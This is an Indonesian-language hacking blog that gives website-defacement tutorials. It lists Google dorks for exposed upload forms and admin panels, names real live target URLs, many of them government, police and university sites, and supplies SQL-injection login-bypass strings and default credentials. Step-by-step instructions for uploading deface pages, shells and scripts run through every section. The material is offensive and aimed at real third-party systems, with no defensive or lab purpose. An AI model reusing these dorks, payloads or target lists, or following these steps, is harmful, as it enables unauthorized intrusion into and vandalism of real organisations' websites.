Mengenai Mr.Heckers

Foto saya
Owner LulzSec Indonesia

Deface Poc Drupal

 




# Deface Poc Drupal


dork : - Dork:allowed file type txt jpg html gif site

       - Dork:allowed file types: png gif jpg txt site:gov

       - Dork:allowed file types: png gif jpg txt site:com

       - Dork:allowed file types: png gif jpg txt site:edu

       - Allowed file types png gif jpg txt school

       

live target :

            - https://airsense.com/en/contact/service

            - http://www.twk.org.za/career-application

            - http://www.bali.polri.go.id/?q=node/175

            - https://www.climateadvocacylab.org/contact-0

            - http://expressprintingservice.ca/send-files

            - https://www.smithcoffey.com.au/upload-files/

            - http://csrgardens.in/?q=Contact

            - https://www.cdvi.co.uk/submission

            - https://iberoamericajournal.ru/en/send-article.html-0

            - http://www.somerville.org.au/typography/sub-page-webform

            - https://www.imatra.fi/en/give-us-feedback-20686

            - https://eastprovidenceri.gov/form/online-police-report-theft

            - https://www.mcgill.ca/socialwork/social-work-submissions

            - http://nfbmd.org/scholars#

Deface Poc Dorking Uploader





Deface Poc Dorking Uploder


dork : - File Upload Manager v1.3

       - Intitel:File Upload Manager v1.3


live target : 

            https://filesmarcinx125.prv.pl


jika ini script deface kalian namakan jangan html tapi htm


============================================================================================

Deface Poc Uploadbutton





 #Deface Poc Uploadbuton


dork : inurl://uploadbutton


live target:

            http://www.znmeter.com/admin/kindeditor/examples/uploadbutton.html

            

jika berhasil di upload silahkan salin yg sudah di upload

Setalah itu tempelkan di belakang site


============================================================================================


DEFACE POC FILE CHUKER

 




#Deface Poc File Chuker


dork : - inurl:/cgi-bin/filechucker.cgi

       - intext:"toptown file upload"

       - inurl:/cgi-bin/filechucker.pl

       - intext:file"upload by encodable"

       

live target:

            http://upload.bloggingheads.tv/upload/


Untuk memanggil nya

http://upload.bloggingheads.tv/upload/files/script kalian.html


============================================================================================


Deface Poc File Hosting

 




DEFACER UNTUK PEMULA BY Mr.Heckers


Kalo Tidak Tahu Tanya Saya ChandraXGanss


============================================

Author : Mr.Heckers

Team : MAVIA TEKNOLOGI INDONESIA & JAKARTA BLACK-HAT

============================================


============================================================================================


# Deface Poc File Hosting


dork : intext: select or drop file(s)


live target:

            https://a.regu.moe/

            https://img.neko.airforce/

      

pesan: kalian bisa upload script secara langsung


============================================================================================

Deface Poc Jdih Bypass admin

 Poc jdih bypass





Dork :

inurl:2019 © Copyright JDIH

inurl:JDIH / Data Dokumen


Kembangin lgi


Xploit:

admin/login.php


user / pass

' or 1=1 limit 1 -- -+

admin' or 1=1 or ''='


Live target:https://jdih.lombokutarakab.go.id/admin/login.php

Deface poc kontributor jso

 






Deface poc kontributor:

Dork:inurl:/kontributor site:go.id

 Dork ke dua:inurl:/kontributor site:com

Terserah mau pakai site yang mana saja yang penting ada bacaan kontributor nya


Ok pilih yang mana saja isi asal saja dan upload file itu taro logo kalian

Jika udh ke dashboard pencet garis 3 di pojok kanan atas lalu ke modul berita pencet berita lalu tambah file 

Nah dibagian ini kalian isi : 


Judul : bebas

Sub.judul : bebas

V.Youtube : kosongin

Kategori : bebas

Headline : Ya

Pilihan :Ya

Ber.Utama : Ya

Isi Berita : Kosongin

Ket.Gmbr : isi sc jso kalian


Jika sudah lalu kalian klik tambahkan..

Jika udah 

http://target.com/administrator/listberita

Hapus dari liat sampai ke administrator 

Contoh:

http://target.com/berita

Jika udah ke deface tinggal seperti ini saja

http://target.com/nama deface nya misal:hacked-by-mrheckers. Harus kecil semua 

Contoh deface

Dan boom kalian telah deface web tersebut


Deface poc bypass admin file txt

Cara deface bypass




Web:https://www.pesmalaysia.com/login.php



Login user pw di bawah

User&pw: 'or 1=1 limit 1 -- -+


Yg ada nick gua gk usah peduliin, abis itu upload file yg di atas nick file nya txt kalau html akan error 

Save aj klo akses berhasil pencet yg ada gambar img nya seperti ini


Buka di tab baru, 


Hapus yg terakhir ( &thumb=1 ) di hapus lalu jadi lah deface kalian

Deface Bypass admin




 Dork bypass admin


index of /admin/ login.php

intitle:"admin panel" login

inurl:/admin login site:in

inurl:/admin/login.asp



User & Pw


' or 1=1 limit 1 -- -

admin' or '1'='1'#

admin' or '1'='

'or 1=1 limit 1 -- -+



BY :chandra

Ok kali ini gw akan kasih tutor buat depes web nah ini klian pilih salah satu dork di atas nanti bisa liat saya, dan pilih user &pw nya terserah kalian lah pokok nya ok langsung mulai aja

Deface Bypass admin V2




 Bypass admin V2


By .:-Chandra-:.


Dork :


inurl:/admin-login.php site:.br

intitle:admin site:.br

inurl:admin/login.php site:.br

inurl:login.php/admin site:.br

inurl:panel/login.php site:.br

inurl:admin/panel login site:.br

inurl:admin/login.php site:.go.id

inurl:admin / login.php site:.go.id

inurl:admin / login.php site:.sch.id

inurl:admin/login site:.ac.id

inurl:/admin/"panel site:.com

inurl:"admin/panel" site:.com



user & pw


admin' or '1'='1'#

'or' 1=1 limit 1 -- -+

' or 1=1 limit 1 -- -+

' or '1'='1' limit -1#

'or' 1=1 limit 1 -- --

'or' 1=1 limit 1 -- -÷

'or' 1=1 'one -- -+

'1'='1' -- limit 1 -- -1#

' or 1=1 limit 1 -- -

admin' or '1'='#


Jika udah masuk deasboard serah kalian mo apain

   

  -:by Chandra:-

Deface Poc Default U/P ildis

 




Poc Default U/P ildis

Dork :
inurl:jdih bphn
inurl:/data_dokumen= site:.go.id

Kembangin lgi .

Kouta/Wifi

Doi/ harus punya !!

Kopi/teh/susu

Susu doi jga bisa :v

Chrome/google

Xploit ->> login

Default u/p ~
User : admin
Pw : admin123

Nah yang pertama itu kita dorking dulu di chrome trus login salah satu web nya trus masukin user sma pass nya ya jika web nya vuln nanti bklan di arah kan ke dashboard admin nya

nahh kalian pencet apa aja dan cari tempat upload shell atau apa gitu jika sudah kalian pencet gambar dan teken tab baru trus dorrr keluar shell janda nya πŸ—ΏπŸ‘πŸ»

Sekian tutor nya dariku trima ksih :)

By : - chandra-

Deface Metode Poc Sql Jso




 Tutorial Cara Poc Sql Jso


Bahan - bahan 


Kopi/teh/susu


Susu doi juga bisa


Shell/Sc


Kesabaran


Lagu biar gk bosen


 -------------------------------------


Dork :


index of /admin/ login.php

intitle:"admin panel" login

inurl:/admin login site:in

inurl:/admin/login.asp



User & Pw


' or 1=1 limit 1 -- -

admin' or '1'='1'#

admin' or '1'='

'or 1=1 limit 1 -- -+ 


1. Login salah satu web yang ada partum perawan dan janda muda jika sudah dapat silahkan login pakai user & pw di atas itu kalo vuln nanti lu bakalan masuk dashboard admin 


2. Lalu pencet bagian profil admin nya terus ganti aja nama admin sama pw dan bio web nya tunggu sampai jso nya muncul ntar keluar tuhh nick lu yang viral di masa dulu nya sekarang sudah tidak viral lagi



Kalo hoki ntar tuh web bakalan blankk dan akan terjso sma sc lu kalo ga hoki dan di bagian login admin nya itu nanti akan terjso jga 



Thanks to :

Mavia Teknologi Indonesia

PT.HEKERSHELLJAYABAYA

Jakarta Black-Hat

Mr Kalvan-Mr P94n9^_^-Shima

Deface poc register codoforum up file txt

  



poc register codoforum up file txt


Dork : inurl:/user/register intext:"powered by codoforum"


Kembangin lgi ya tod

Web vuln:https://manifold.garden/forums/index.php?u=/user/register

https://forum.m7admit.com/user/register

https://www.erasmusprogramme.com/forum/index.php?u=/user/register


Punya ku: https://forum.jaben-indo.com/sites/default/assets/img/profiles/62a3367f3f77b.txt

By:Mr.Heckers

Ok kembali lagi di channel gw sekarang gua akan kasih tau cara depes register codoforum up file

Kalian gk perlu cape² nyari di atas ada kok target nya

Labels:

Deface bypass admin jso





Dork:
intext:@www.pinisisoft.com
intext:MULAI HITUNG Panjar
Kembangin Lagi Biar Dapat Yg Vuln
(Kembangin sendiri bang/kak) 

Exploid : /admin/login

U/p Default: ' or 1=1 limit 1 -- -+

Jika udah logi  pencet ke garis tiga kanan atas lalu ke pengaturan ke instaliasi pengguna dan serah kalian tinggal taro script jso kalian
Langganan: Postingan (Atom)

Deface Poc Drupal

  # Deface Poc Drupal dork : - Dork:allowed file type txt jpg html gif site        - Dork:allowed file types: png gif jpg txt site:gov      ...

  • Deface Poc Default U/P ildis
      Poc Default U/P ildis Dork : inurl:jdih bphn inurl:/data_dokumen= site:. go.id Kembangin lgi . Kouta/Wifi Doi/ harus punya !! Kopi/...
  • Deface Poc Dorking Uploader
    Deface Poc Dorking Uploder dork : - File Upload Manager v1.3        - Intitel:File Upload Manager v1.3 live target :              https://fi...